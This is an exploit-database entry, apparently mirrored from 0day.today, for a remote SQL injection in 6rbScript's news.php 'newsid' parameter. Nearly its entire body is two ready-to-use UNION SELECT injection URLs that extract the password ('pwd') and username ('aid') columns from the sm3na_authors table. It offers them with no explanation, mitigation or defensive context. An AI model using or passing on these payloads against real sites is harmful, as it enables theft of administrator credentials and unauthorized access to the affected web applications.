id: 3059
date: 05/20/2008
title: 6rbScript (news.php newsid) Remote SQL Injection Vulnerability
author: Hussin X
cves: 

==============================================================
6rbScript (news.php newsid) Remote SQL Injection Vulnerability
==============================================================



##########################################################

Exploit:

PWD

http://www.xxx.com/news.php?newsid=79+union+select+1,pwd,3,4+from/**/sm3na_authors--

USER

http://www.xxx.com/news.php?newsid=79+union+select+1,aid,3,4+from/**/sm3na_authors--




###########################################################



#  0day.today [2023-03-22]  #